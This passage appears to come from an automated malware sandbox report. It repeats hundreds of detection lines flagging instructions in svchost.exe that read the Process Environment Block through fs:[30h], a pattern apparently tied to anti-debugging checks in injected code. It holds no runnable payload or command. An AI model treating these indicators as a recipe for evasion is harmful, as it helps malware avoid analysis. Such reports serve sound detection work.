            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]2_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEB3D0 mov ecx, dword ptr fs:[00000030h]2_2_03CEB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF3E6 mov eax, dword ptr fs:[00000030h]2_2_03CEF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D053FC mov eax, dword ptr fs:[00000030h]2_2_03D053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]2_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0539D mov eax, dword ptr fs:[00000030h]2_2_03D0539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A mov eax, dword ptr fs:[00000030h]2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A mov eax, dword ptr fs:[00000030h]2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C533A5 mov eax, dword ptr fs:[00000030h]2_2_03C533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C633A0 mov eax, dword ptr fs:[00000030h]2_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C633A0 mov eax, dword ptr fs:[00000030h]2_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C mov eax, dword ptr fs:[00000030h]2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C mov eax, dword ptr fs:[00000030h]2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05341 mov eax, dword ptr fs:[00000030h]2_2_03D05341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29353 mov eax, dword ptr fs:[00000030h]2_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29353 mov eax, dword ptr fs:[00000030h]2_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF367 mov eax, dword ptr fs:[00000030h]2_2_03CEF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D mov eax, dword ptr fs:[00000030h]2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D mov eax, dword ptr fs:[00000030h]2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5F32A mov eax, dword ptr fs:[00000030h]2_2_03C5F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C27330 mov eax, dword ptr fs:[00000030h]2_2_03C27330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C392C5 mov eax, dword ptr fs:[00000030h]2_2_03C392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C392C5 mov eax, dword ptr fs:[00000030h]2_2_03C392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03C5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03C5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D052E2 mov eax, dword ptr fs:[00000030h]2_2_03D052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF2F8 mov eax, dword ptr fs:[00000030h]2_2_03CEF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C292FF mov eax, dword ptr fs:[00000030h]2_2_03C292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05283 mov eax, dword ptr fs:[00000030h]2_2_03D05283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6329E mov eax, dword ptr fs:[00000030h]2_2_03C6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6329E mov eax, dword ptr fs:[00000030h]2_2_03C6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A0 mov eax, dword ptr fs:[00000030h]2_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A0 mov eax, dword ptr fs:[00000030h]2_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A0 mov eax, dword ptr fs:[00000030h]2_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A0 mov eax, dword ptr fs:[00000030h]2_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF92A6 mov eax, dword ptr fs:[00000030h]2_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF92A6 mov eax, dword ptr fs:[00000030h]2_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF92A6 mov eax, dword ptr fs:[00000030h]2_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF92A6 mov eax, dword ptr fs:[00000030h]2_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC72A0 mov eax, dword ptr fs:[00000030h]2_2_03CC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC72A0 mov eax, dword ptr fs:[00000030h]2_2_03CC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB92BC mov eax, dword ptr fs:[00000030h]2_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB92BC mov eax, dword ptr fs:[00000030h]2_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB92BC mov ecx, dword ptr fs:[00000030h]2_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB92BC mov ecx, dword ptr fs:[00000030h]2_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29240 mov eax, dword ptr fs:[00000030h]2_2_03C29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29240 mov eax, dword ptr fs:[00000030h]2_2_03C29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6724D mov eax, dword ptr fs:[00000030h]2_2_03C6724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEB256 mov eax, dword ptr fs:[00000030h]2_2_03CEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEB256 mov eax, dword ptr fs:[00000030h]2_2_03CEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFD26B mov eax, dword ptr fs:[00000030h]2_2_03CFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFD26B mov eax, dword ptr fs:[00000030h]2_2_03CFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C59274 mov eax, dword ptr fs:[00000030h]2_2_03C59274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C71270 mov eax, dword ptr fs:[00000030h]2_2_03C71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C71270 mov eax, dword ptr fs:[00000030h]2_2_03C71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C67208 mov eax, dword ptr fs:[00000030h]2_2_03C67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C67208 mov eax, dword ptr fs:[00000030h]2_2_03C67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05227 mov eax, dword ptr fs:[00000030h]2_2_03D05227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6D1D0 mov eax, dword ptr fs:[00000030h]2_2_03C6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6D1D0 mov ecx, dword ptr fs:[00000030h]2_2_03C6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D051CB mov eax, dword ptr fs:[00000030h]2_2_03D051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C351ED mov eax, dword ptr fs:[00000030h]2_2_03C351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD71F9 mov esi, dword ptr fs:[00000030h]2_2_03CD71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C87190 mov eax, dword ptr fs:[00000030h]2_2_03C87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE11A4 mov eax, dword ptr fs:[00000030h]2_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE11A4 mov eax, dword ptr fs:[00000030h]2_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE11A4 mov eax, dword ptr fs:[00000030h]2_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE11A4 mov eax, dword ptr fs:[00000030h]2_2_03CE11A4
